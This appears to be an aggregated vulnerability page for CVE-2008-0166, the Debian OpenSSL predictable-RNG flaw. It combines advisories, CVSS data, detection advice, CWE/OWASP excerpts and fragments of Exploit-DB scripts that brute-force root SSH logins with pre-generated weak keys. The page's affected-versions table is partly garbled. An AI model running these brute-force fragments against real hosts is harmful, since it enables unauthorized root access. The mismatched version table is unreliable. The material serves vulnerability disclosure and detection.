CVE-2008-0166
published 2008-05-13CVE-2008-0166: OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which…
PriorityP260high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
70.72%
99.3th percentile
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
Affected
24 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | openssh | < openssh 4.7p1-9 (bookworm) | openssh 4.7p1-9 (bookworm) |
| debian | openssh | < openssh 1:4.7p1-10 (bookworm) | openssh 1:4.7p1-10 (bookworm) |
| debian | openssl | < openssh 4.7p1-9 (bookworm) | openssh 4.7p1-9 (bookworm) |
| openbsd | openssh | >= 0 < 1:4.7p1-10 | 1:4.7p1-10 |
| openbsd | openssh | >= 0 < 4.7p1-9 | 4.7p1-9 |
| openbsd | openssh | >= 0 < 1:4.7p1-10 | 1:4.7p1-10 |
| openbsd | openssh | >= 0 < 4.7p1-9 | 4.7p1-9 |
| openbsd | openssh | >= 0 < 1:4.7p1-10 | 1:4.7p1-10 |
| openbsd | openssh | >= 0 < 4.7p1-9 | 4.7p1-9 |
| openbsd | openssh | >= 0 < 1:4.7p1-10 | 1:4.7p1-10 |
| openbsd | openssh | >= 0 < 4.7p1-9 | 4.7p1-9 |
| openssl | openssl | >= 0 < 0.9.8g-9 | 0.9.8g-9 |
| openssl | openssl | >= 0 < 0.9.8g-9 | 0.9.8g-9 |
| openssl | openssl | >= 0 < 0.9.8g-9 | 0.9.8g-9 |
| openssl | openssl | >= 0 < 0.9.8g-9 | 0.9.8g-9 |
| openssl | openssl | 0.9.8c-1 – 0.9.8g | — |
| ubuntu | linux | — | — |
| ubuntu | linux | — | — |
| ubuntu | linux | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →CVE-2008-0166 (Debian Predictable RNG) produces a severely limited keyspace for RSA/DSA keys generated on affected Debian/Ubuntu systems. Detect use of weak predictable SSH private keys by comparing against the known set of ~32,768 possible keys for each key length/type combination. ↗
- →Exploit tooling for CVE-2008-0166 iterates through a directory of pre-generated weak SSH private keys and attempts authentication against a target host using multiple threads. Monitor for rapid sequential SSH authentication attempts using different key files from the same source IP. ↗
- →The brute-force exploit (exploit-db 5622) batches multiple weak SSH private keys per connection attempt against root. Alert on SSH login attempts to the root account using public-key authentication in rapid succession. ↗
- →TLS certificates generated on Debian-based systems between September 2006 and May 2008 may use predictable weak keys. Audit TLS certificates in use and check key fingerprints against published lists of compromised Debian weak keys. ↗
- ·The exploit script (exploit-db 5720) requires a local directory of pre-generated weak Debian SSH private keys as input; detection depends on the attacker having obtained the weak key set externally before launching the attack. ↗
- ·The exploit-db 5622 script estimates compromise in under 20 minutes, indicating the full weak-key space can be exhausted rapidly and detection windows are short. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:C/I:N/A:N
osv7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
vendor_ubuntu7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
OpenSSH update
vendor_ubuntu·2008-05-20
CVE-2008-0166 OpenSSH update
Title: OpenSSH update
Summary: OpenSSH update
USN-612-2 introduced protections for OpenSSH, related to the OpenSSL
vulnerabilities addressed by USN-612-1. This update provides the
corresponding updates for OpenSSH in Ubuntu 6.06 LTS. While the OpenSSL
in Ubuntu 6.06 is not vulnerable, this update will block weak keys
generated on systems that may have been affected themselves.
Original advisory details:
A weakness has been discovered in the random number generator used
by OpenSSL on Debian and Ubuntu systems. As a result of this
weakness, certain encryption keys are much more common than they
should be, such that an attacker could guess the key through a
brute-force attack given minimal knowledge of the system. This
particularly affects the use of encryption keys in OpenSSH, OpenVPN
an
Ubuntu
ssl-cert vulnerability
vendor_ubuntu·2008-05-14·CVSS 7.5
CVE-2008-0166 [HIGH] ssl-cert vulnerability
Title: ssl-cert vulnerability
Summary: ssl-cert vulnerability
USN-612-1 fixed vulnerabilities in openssl. This update provides the
corresponding updates for ssl-cert -- potentially compromised snake-oil
SSL certificates will be regenerated.
Original advisory details:
A weakness has been discovered in the random number generator used
by OpenSSL on Debian and Ubuntu systems. As a result of this
weakness, certain encryption keys are much more common than they
should be, such that an attacker could guess the key through a
brute-force attack given minimal knowledge of the system. This
particularly affects the use of encryption keys in OpenSSH, OpenVPN
and SSL certificates.
This vulnerability only affects operating systems which (like
Ubuntu) are based on Debian. However, other systems can
Ubuntu
OpenSSL vulnerability
vendor_ubuntu·2008-05-13·CVSS 7.5
CVE-2008-0166 [HIGH] OpenSSL vulnerability
Title: OpenSSL vulnerability
Summary: OpenSSL vulnerability
A weakness has been discovered in the random number generator used
by OpenSSL on Debian and Ubuntu systems. As a result of this
weakness, certain encryption keys are much more common than they
should be, such that an attacker could guess the key through a
brute-force attack given minimal knowledge of the system. This
particularly affects the use of encryption keys in OpenSSH, OpenVPN
and SSL certificates.
This vulnerability only affects operating systems which (like
Ubuntu) are based on Debian. However, other systems can be
indirectly affected if weak keys are imported into them.
We consider this an extremely serious vulnerability, and urge all
users to act immediately to secure their systems. (CVE-2008-0166)
== Who is affect
Ubuntu
OpenVPN vulnerability
vendor_ubuntu·2008-05-13
CVE-2008-0166 OpenVPN vulnerability
Title: OpenVPN vulnerability
Summary: OpenVPN vulnerability
A weakness has been discovered in the random number generator used
by OpenSSL on Debian and Ubuntu systems. As a result of this
weakness, certain encryption keys are much more common than they
should be, such that an attacker could guess the key through a
brute-force attack given minimal knowledge of the system. This
particularly affects the use of shared encryption keys and SSL/TLS
certificates in OpenVPN.
This vulnerability only affects operating systems which (like
Ubuntu) are based on Debian. However, other systems can be
indirectly affected if weak keys are imported into them.
We consider this an extremely serious vulnerability, and urge all
users to act immediately to secure their systems.
Instructions: Once the update
Ubuntu
OpenSSH vulnerability
vendor_ubuntu·2008-05-13
CVE-2008-0166 OpenSSH vulnerability
Title: OpenSSH vulnerability
Summary: OpenSSH vulnerability
A weakness has been discovered in the random number generator used
by OpenSSL on Debian and Ubuntu systems. As a result of this
weakness, certain encryption keys are much more common than they
should be, such that an attacker could guess the key through a
brute-force attack given minimal knowledge of the system. This
particularly affects the use of encryption keys in OpenSSH.
This vulnerability only affects operating systems which (like
Ubuntu) are based on Debian. However, other systems can be
indirectly affected if weak keys are imported into them.
We consider this an extremely serious vulnerability, and urge all
users to act immediately to secure their systems.
Instructions: Updating your system:
1. Install the security u
Debian
CVE-2008-0166: openssh - OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating system...
vendor_debian·2008·CVSS 7.5
CVE-2008-0166 [HIGH] CVE-2008-0166: openssh - OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating system...
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
Scope: local
bookworm: resolved (fixed in 4.7p1-9)
bullseye: resolved (fixed in 4.7p1-9)
forky: resolved (fixed in 4.7p1-9)
sid: resolved (fixed in 4.7p1-9)
trixie: resolved (fixed in 4.7p1-9)
Debian
CVE-2008-2285: openssh - The ssh-vulnkey tool on Ubuntu Linux 7.04, 7.10, and 8.04 LTS does not recognize...
vendor_debian·2008·CVSS 7.5
CVE-2008-2285 [HIGH] CVE-2008-2285: openssh - The ssh-vulnkey tool on Ubuntu Linux 7.04, 7.10, and 8.04 LTS does not recognize...
The ssh-vulnkey tool on Ubuntu Linux 7.04, 7.10, and 8.04 LTS does not recognize authorized_keys lines that contain options, which makes it easier for remote attackers to exploit CVE-2008-0166 by guessing a key that was not identified by this tool.
Scope: local
bookworm: resolved (fixed in 1:4.7p1-10)
bullseye: resolved (fixed in 1:4.7p1-10)
forky: resolved (fixed in 1:4.7p1-10)
sid: resolved (fixed in 1:4.7p1-10)
trixie: resolved (fixed in 1:4.7p1-10)
Red Hat
CVE-2008-0166: OpenSSL 0
vendor_redhat·CVSS 7.5
CVE-2008-0166 [HIGH] CVE-2008-0166: OpenSSL 0
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
Statement: Not vulnerable. This flaw was caused by a third-party vendor patch to the OpenSSL library. This patch has never been used by Red Hat, and this issue therefore does not affect any Fedora, Red Hat, or upstream supplied OpenSSL packages.
GHSA
GHSA-9c93-c5gr-q8j9: The ssh-vulnkey tool on Ubuntu Linux 7
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2008-2285 [HIGH] GHSA-9c93-c5gr-q8j9: The ssh-vulnkey tool on Ubuntu Linux 7
The ssh-vulnkey tool on Ubuntu Linux 7.04, 7.10, and 8.04 LTS does not recognize authorized_keys lines that contain options, which makes it easier for remote attackers to exploit CVE-2008-0166 by guessing a key that was not identified by this tool.
GHSA
GHSA-4xrg-5554-qffr: OpenSSL 0
ghsa_unreviewed·2022-05-01
CVE-2008-0166 [HIGH] CWE-338 GHSA-4xrg-5554-qffr: OpenSSL 0
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
GHSA
GHSA-cq23-cxpr-f49x: It was found that various OpenID Providers (OPs) had TLS Server Certificates that used weak keys, as a result of the Debian Predictable Random Number
ghsa_unreviewed·2022-04-21·CVSS 7.5
CVE-2008-3280 [HIGH] CWE-338 GHSA-cq23-cxpr-f49x: It was found that various OpenID Providers (OPs) had TLS Server Certificates that used weak keys, as a result of the Debian Predictable Random Number
It was found that various OpenID Providers (OPs) had TLS Server Certificates that used weak keys, as a result of the Debian Predictable Random Number Generator (CVE-2008-0166). In combination with the DNS Cache Poisoning issue (CVE-2008-1447) and the fact that almost all SSL/TLS implementations do not consult CRLs (currently an untracked issue), this means that it is impossible to rely on these OPs.
OSV
CVE-2008-2285: The ssh-vulnkey tool on Ubuntu Linux 7
osv·2008-05-18·CVSS 7.5
CVE-2008-2285 [HIGH] CVE-2008-2285: The ssh-vulnkey tool on Ubuntu Linux 7
The ssh-vulnkey tool on Ubuntu Linux 7.04, 7.10, and 8.04 LTS does not recognize authorized_keys lines that contain options, which makes it easier for remote attackers to exploit CVE-2008-0166 by guessing a key that was not identified by this tool.
OSV
CVE-2008-0166: OpenSSL 0
osv·2008-05-13·CVSS 7.5
CVE-2008-0166 [HIGH] CVE-2008-0166: OpenSSL 0
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
No detection rules found.
Exploit-DB
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
exploitdb·2008-06-01
CVE-2008-3280 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
OpenSSL 0.9.8c-1 [[port] [threads]]'
print ' : Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ' : The victim host'
print ' : The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'
sys.exit(1)
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
if len(sys.argv) <= 4:
port='22'
threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4
else:
port=sys.argv[4]
threads = sys.argv[5]
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,p
Exploit-DB
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)
exploitdb·2008-05-16
CVE-2008-0166 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)
OpenSSL 0.9.8c-1
#
# This tool helps to find user accounts with weak SSH keys
# that should be regenerated with an unaffected version
# of openssl.
#
# You will need the precalculated keys provided by HD Moore
# See http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Common Keys:
#
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
#
# Usage:
# debian_openssh_key_test.rb
#
# E-DB Note: See here for an update ~ https://github.com/offensive-security/exploitdb/pull/76/files
#
require 'thread'
THREADCOUNT = 10
KEYSPERCONNECT = 3
queue = Queue.new
thre
Exploit-DB
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
exploitdb·2008-05-15
CVE-2008-0166 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
OpenSSL 0.9.8c-1 $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
[email protected]
# milw0rm.com [2008-05-15]
RFC
Internet X.509 Public Key Infrastructure -- Certificate Management Protocol (CMP)
rfc·2025-07-01
Internet X.509 Public Key Infrastructure -- Certificate Management Protocol (CMP)
Internet Engineering Task Force (IETF) H. Brockhaus
Request for Comments: 9810 D. von Oheimb
Obsoletes: 4210, 9480 Siemens
Updates: 5912 M. Ounsworth
Category: Standards Track J. Gray
ISSN: 2070-1721 Entrust
July 2025
Internet X.509 Public Key Infrastructure -- Certificate Management
Protocol (CMP)
Abstract
This document describes the Internet X.509 Public Key Infrastructure
(PKI) Certificate Management Protocol (CMP). Protocol messages are
defined for X.509v3 certificate creation and management. CMP
provides interactions between client systems and PKI components such
as a Registration Authority (RA) and a Certification Authority (CA).
This document adds support for management of certificates containing
a Key Encapsulation Mechanism (KEM) public key and uses EnvelopedData
instead
RFC
Conveying a Certificate Signing Request (CSR) in a Secure Zero-Touch Provisioning (SZTP) Bootstrapping Request
rfc·2024-10-01
Conveying a Certificate Signing Request (CSR) in a Secure Zero-Touch Provisioning (SZTP) Bootstrapping Request
Internet Engineering Task Force (IETF) K. Watsen
Request for Comments: 9646 Watsen Networks
Updates: 8572 R. Housley
Category: Standards Track Vigil Security
ISSN: 2070-1721 S. Turner
sn3rd
October 2024
Conveying a Certificate Signing Request (CSR) in a Secure Zero-Touch
Provisioning (SZTP) Bootstrapping Request
Abstract
This document extends the input to the "get-bootstrapping-data" RPC
defined in RFC 8572 to include an optional certificate signing
request (CSR), enabling a bootstrapping device to additionally obtain
an identity certificate (e.g., a Local Device Identifier (LDevID)
from IEEE 802.1AR) as part of the "onboarding information" response
provided in the RPC-reply.
Status of This Memo
This is an Internet Standards Track document.
This document is a product of the Inte
RFC
Certificate Management Protocol (CMP) Updates
rfc·2023-11-01
Certificate Management Protocol (CMP) Updates
Internet Engineering Task Force (IETF) H. Brockhaus
Request for Comments: 9480 D. von Oheimb
Updates: 4210, 5912, 6712 Siemens
Category: Standards Track J. Gray
ISSN: 2070-1721 Entrust
November 2023
Certificate Management Protocol (CMP) Updates
Abstract
This document contains a set of updates to the syntax of Certificate
Management Protocol (CMP) version 2 and its HTTP transfer mechanism.
This document updates RFCs 4210, 5912, and 6712.
The aspects of CMP updated in this document are using EnvelopedData
instead of EncryptedValue, clarifying the handling of p10cr messages,
improving the crypto agility, as well as adding new general message
types, extended key usages to identify certificates for use with CMP,
and well-known URI path segments.
CMP version 3 is introduced to enable s
arXiv
One Bad Apple Spoils the Barrel: Understanding the Security Risks Introduced by Third-Party Components in IoT Firmware
arxiv_fulltext·2022-12-29
One Bad Apple Spoils the Barrel: Understanding the Security Risks Introduced by Third-Party Components in IoT Firmware
One Bad Apple Spoils the Barrel: Understanding the Security Risks Introduced by Third-Party Components in IoT Firmware
## Abstract
Currently, the development of IoT firmware heavily depends on third-party components (TPCs) to improve development efficiency. Nevertheless, TPCs are not secure, and the vulnerabilities in TPCs will influence the security of IoT firmware. Existing works pay less attention to the vulnerabilities caused by TPCs, and we still lack a comprehensive understanding of the security impact of TPC vulnerability against firmware. To fill in the knowledge gap, we design and implement , which leverages syntactical features and control-flow graph features to detect the TPCs in firmware, and then recognizes the corresponding vulnerabilities. Based on , we present the first l
arXiv
An Algorithm to Find Optimal Attack Paths in Nondeterministic Scenarios
arxiv_fulltext·2013-06-17
An Algorithm to Find Optimal Attack Paths in Nondeterministic Scenarios
AISec'11, October 21, 2011, Chicago, Illinois, USA.
2011
978-1-4503-1003-1/11/10
=10000
= 10000
An Algorithm to Find Optimal Attack Paths in Nondeterministic Scenarios
3
Carlos Sarraute
Core Security Technologies and ITBA
Buenos Aires, Argentina
[email protected]
Gerardo Richarte
Core Security Technologies
Buenos Aires, Argentina
[email protected]
Jorge Luc\'angeli Obes
Universidad de Buenos Aires
Argentina
[email protected]
30 June 2011
## Abstract
As penetration testing frameworks have evolved and have become more complex,
the problem of controlling automatically the pentesting tool
has become an important question.
This can be naturally addressed as an attack planning problem.
Previous approaches to this problem were based
on modeling the actions and assets in the PDDL
CWE
Predictable Seed in Pseudo-Random Number Generator (PRNG)
mitre_cwe·CVSS 7.5
[HIGH] CWE-337 Predictable Seed in Pseudo-Random Number Generator (PRNG)
CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG)
A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time.
The use of predictable seeds significantly reduces the number of possible seeds that an attacker would need to test in order to predict which random numbers will be generated by the PRNG.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Other. Impact: Varies by Context.
Detection Methods:
Automated Static Analysis: Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or b
OWASP
Testing for Weak Transport Layer Security
owasp
Testing for Weak Transport Layer Security
# Testing for Weak Transport Layer Security
|ID |
|------------|
|WSTG-CRYP-01|
## Summary
When information is sent between the client and the server, it must be encrypted and protected in order to prevent an attacker from being able to read or modify it. This is most commonly done using HTTPS, which uses the [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security) protocol, a replacement for the older Secure Socket Layer (SSL) protocol. TLS also provides a way for the server to demonstrate to the client that they have connected to the correct server, by presenting a trusted digital certificate.
Over the years there have been a large number of cryptographic weaknesses identified in the SSL and TLS protocols, as well as in the ciphers that they use. Addit
CWE
Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
mitre_cwe
CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong.
When a non-cryptographic PRNG is used in a cryptographic context, it can expose the cryptography to certain types of attacks. Often a pseudo-random number generator (PRNG) is not designed for cryptography. Sometimes a mediocre source of randomness is sufficient or preferable for algorithms that use random numbers. Weak generators generally take less processing power and/or do not use the precious, finite, entropy sources on a system. While such PRNGs might have very useful features, these same features could be used to break the cryptography.
Modes of Introduction:
Phase: Arc
CWE
Use of Insufficiently Random Values
mitre_cwe
CWE-330 Use of Insufficiently Random Values
CWE-330: Use of Insufficiently Random Values
The product uses insufficiently random numbers or values in a security context that depends on unpredictable numbers.
Background: Computers are deterministic machines, and as such are unable to produce true randomness. Pseudo-Random Number Generators (PRNGs) approximate randomness algorithmically, starting with a seed from which subsequent values are calculated. There are two types of PRNGs: statistical and cryptographic. Statistical PRNGs provide useful statistical properties, but their output is highly predictable and forms an easy to reproduce numeric stream that is unsuitable for use in cases where security depends on generated values being unpredictable. Cryptographic PRNGs address this problem by generating output that is more difficult
http://metasploit.com/users/hdm/tools/debian-openssl/http://secunia.com/advisories/30136http://secunia.com/advisories/30220http://secunia.com/advisories/30221http://secunia.com/advisories/30231http://secunia.com/advisories/30239http://secunia.com/advisories/30249http://sourceforge.net/mailarchive/forum.php?thread_name=48367252.7070603%40shemesh.biz&forum_name=rsyncrypto-develhttp://www.debian.org/security/2008/dsa-1571http://www.debian.org/security/2008/dsa-1576http://www.kb.cert.org/vuls/id/925211http://www.securityfocus.com/archive/1/492112/100/0/threadedhttp://www.securityfocus.com/bid/29179http://www.securitytracker.com/id?1020017http://www.ubuntu.com/usn/usn-612-1http://www.ubuntu.com/usn/usn-612-2http://www.ubuntu.com/usn/usn-612-3http://www.ubuntu.com/usn/usn-612-4http://www.ubuntu.com/usn/usn-612-7http://www.us-cert.gov/cas/techalerts/TA08-137A.htmlhttps://16years.secvuln.infohttps://exchange.xforce.ibmcloud.com/vulnerabilities/42375https://news.ycombinator.com/item?id=40333169https://www.exploit-db.com/exploits/5622https://www.exploit-db.com/exploits/5632https://www.exploit-db.com/exploits/5720http://metasploit.com/users/hdm/tools/debian-openssl/http://secunia.com/advisories/30136http://secunia.com/advisories/30220http://secunia.com/advisories/30221http://secunia.com/advisories/30231http://secunia.com/advisories/30239http://secunia.com/advisories/30249http://sourceforge.net/mailarchive/forum.php?thread_name=48367252.7070603%40shemesh.biz&forum_name=rsyncrypto-develhttp://www.debian.org/security/2008/dsa-1571http://www.debian.org/security/2008/dsa-1576http://www.kb.cert.org/vuls/id/925211http://www.securityfocus.com/archive/1/492112/100/0/threadedhttp://www.securityfocus.com/bid/29179http://www.securitytracker.com/id?1020017http://www.ubuntu.com/usn/usn-612-1http://www.ubuntu.com/usn/usn-612-2http://www.ubuntu.com/usn/usn-612-3http://www.ubuntu.com/usn/usn-612-4http://www.ubuntu.com/usn/usn-612-7http://www.us-cert.gov/cas/techalerts/TA08-137A.htmlhttps://16years.secvuln.infohttps://exchange.xforce.ibmcloud.com/vulnerabilities/42375https://news.ycombinator.com/item?id=40333169https://www.exploit-db.com/exploits/5622https://www.exploit-db.com/exploits/5632https://www.exploit-db.com/exploits/5720
2008-05-13
Published